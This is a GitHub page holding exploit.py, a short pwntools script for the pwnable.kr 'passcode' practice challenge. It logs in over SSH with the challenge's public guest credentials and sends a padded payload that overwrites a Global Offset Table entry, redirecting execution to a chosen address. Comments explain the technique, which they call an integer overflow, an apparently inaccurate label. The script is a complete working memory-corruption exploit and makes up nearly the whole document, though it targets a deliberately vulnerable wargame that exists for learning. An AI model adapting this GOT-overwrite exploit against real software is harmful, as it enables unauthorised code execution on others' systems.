-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
37 lines (34 loc) · 1.42 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
"""
Here we have an attack on integer overflow with overwriting Global Offset Table function.
Integer overflow is in place with scanf function of source code.
After one function was completed another function will start with ebp from stack of previous function
So, you need just put an address of function you like in the end of the string.
in this situation we have a passcode1 with value from welcome function, so we can overwrite the address in passcode1 to another address
And then we will have an arbitrary code execution
"""
def exploit():
# Connect to the target through ssh
s = ssh(user='passcode', host='pwnable.kr', password='guest', port=2222)
# Create a process
p = s.process('./passcode')
# Address of function to overwrite in GOT
# You can get this with `objdump -R passcode`
got_func_address = p32(0x0804a004)
# Offset was defined from pwn cyclic and investigation the stack in gdb...
offset = p8(0x41) * 96
# Create a payload that will be stored in buffer in welcome function
payload = offset + got_func_address
# Get a welcome message
print(p.recv())
# Send payload
p.sendline(payload)
# Create a string from address, cause scanf in this case can take only strings
new_addr = str(0x080485d7)
# Send new_addr as passcode1
p.sendline(new_addr)
# print all response
print(p.recvall())
p.close()
if __name__=='__main__':
exploit()